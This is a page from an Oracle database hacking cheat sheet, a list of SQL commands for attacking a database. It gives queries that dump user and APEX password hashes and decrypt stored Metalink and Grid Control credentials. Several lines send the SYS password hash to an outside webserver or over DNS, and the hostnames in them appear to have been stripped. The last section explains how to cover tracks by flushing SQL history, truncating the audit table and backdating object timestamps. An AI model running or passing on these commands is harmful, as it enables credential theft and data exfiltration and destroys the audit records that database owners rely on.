Oracle Cheat Sheet Page 4


Information Retrieval:
Hacking Oracle
Version 1.5.0 - 29-Jan-2008
Get version:
select * from v$version
-- all users
Get security patchlevel:
select * from dba_registry_history;
-- only DBA, 9i+, empty or non existing table= no Security Patch
Installed database components:
select * from dba_registry;
-- only DBA
Get userlist:
select * from all_users;
-- all users
Get user & PW hashes(7-10g):
select username,password,account_status from dba_users;
-- only DBA until 10g R2
Get user & PW hashes(11g/10g):
select name,password,spare4,accountstatus from sys.user$, sys.dba_users where user#=user_id;
-- only DBA 11g R1
Get Apex password hashes:
select user_name, web_password_raw from flows_030000.wwv_flow_fnd_user;
-- only DBA, 030000 = APEX version 3.0, 020100=2.1
Decrypt Apex password hashes:
select user_name, utl_http.request(' '||web_password_raw||’&b=MD5-Search’) -- only DBA, requires internet access from the database
from flows_030000.wwv_flow_fnd_user;
Get Metalink account/password:
select sysman.decrypt(aru_username), sysman.decrypt(aru_password) from sysman.mgmt_aru_credentials;-- only DBA, 10g
Get password of mgmt_view_user select view_username, sysman.decrypt(view_password) from sysman.mgmt_view_user_credentials;
-- only DBA, 10g
Get passwords of DB/Grid control: select credential_set_column, sysman.decrypt(credential_value) from sysman.mgmt_credentials2;
-- only DBA, 10g
TDE encrypted tables:
select table_name,column_name,encryption_alg,salt from dba_encrypted_columns;
-- only DBA, 10g – 11g
Show code using encryption:
select owner, name, type, referenced_name from all_dependencies where referenced_name
-- show objects using database encryption (e.g. for passwords)
Already DBA?
desc dba_users
-- only possible if DBA (or select any dictionary), not audited
Get system privileges:
select * from user_sys_privs;
-- show system privileges of the current user
Get role privileges:
select * from user_role_privs;
-- show role privileges of the current user
Get table privileges:
select * from user_tab_privs;
-- show table privileges of the current user
Get interesting tables:
select table_name,column_name,owner from dba_tab_columns where ((upper(column_name)
-- show tables with columns containing the string 'PWD’, ...
like '%PWD%' or upper(column_name) like '%PASSW%' or upper(column_name) like '%CREDEN%' or
-- the scripts anapassword.sql is checking all objects
upper(column_name) like '%AUTH%'))
Get tables with passwords:
-- run the SQL script anapassword.sql
Get a list of all Oracle directories:
select * from dba_directories;
-- show Oracle directories
Access SQL history (v$sql):
select sql_text from sys.v$sql where lower(sql_text) like '%utl_http%’;
-- search all SQL statements in the database containing the string utl_http
Access SQL history (wrh$_sqltext): select sql_text from sys.wrh$_sqltext where lower(sql_text) like '%utl_http%’;
-- search all SQL statements containing the string utl_http
Check, if audit_sys_operations:
select name,value from v$parameter where name = 'audit_sys_operations';
-- check if commands submitted by SYS are audited
Check for database trigger:
select owner,trigger_name from dba_triggers where trigger_type='AFTER EVENT’;
-- check for logon, dll or startup/shutdown trigger
Search strings in tables (dbgrep)
-- run the SQL script dbgrep.sql (from RDS))
Get information from listener.log
-- run the SQL script analistener.sql (from RDS)
Web Access:
Web access via utl_http:
select utl_http.request(' ) from dual;
-- all users,, 8-10g R2
Web access via httpuritype:
select httpuritype( ' ' ).getclob() from dual;
-- all users,, 8-10g R2
Send password hash to webserver: select utl_http.request(' (select username||’=’||password from dba_users
-- only DBA, change value of username for other users
where username=’SYS’)) from dual;
Send password hash to webserver: select httpuritype(' (select username||’=’||password from dba_users
-- only DBA, change value of username for other users
where username=’SYS’)).getclob() from dual;
Send password hash via DNS:
select utl_http.request(' (select username||’=’||password from dba_users
-- only DBA, change value of username for other users
where username=’SYS’) ) from dual;
Clear v$sql:
alter system flush shared pool;
-- only DBA, all versions
Clear sys.wrh_sqlstat:
truncate table sys.wrh$_sqlstat;
-- only DBA, 10g/11g
Clear audit-Table:
truncate table sys.aud$;
-- only as SYS, all versions
Clear audit-Table:
delete table sys.aud$;
-- only, all versions
Change object creation date:
update sys.obj$ set ctime=sysdate-300, mtime=sysdate-300, stime=sysdate-300 where name='AUD$';
-- change the creation date of an object


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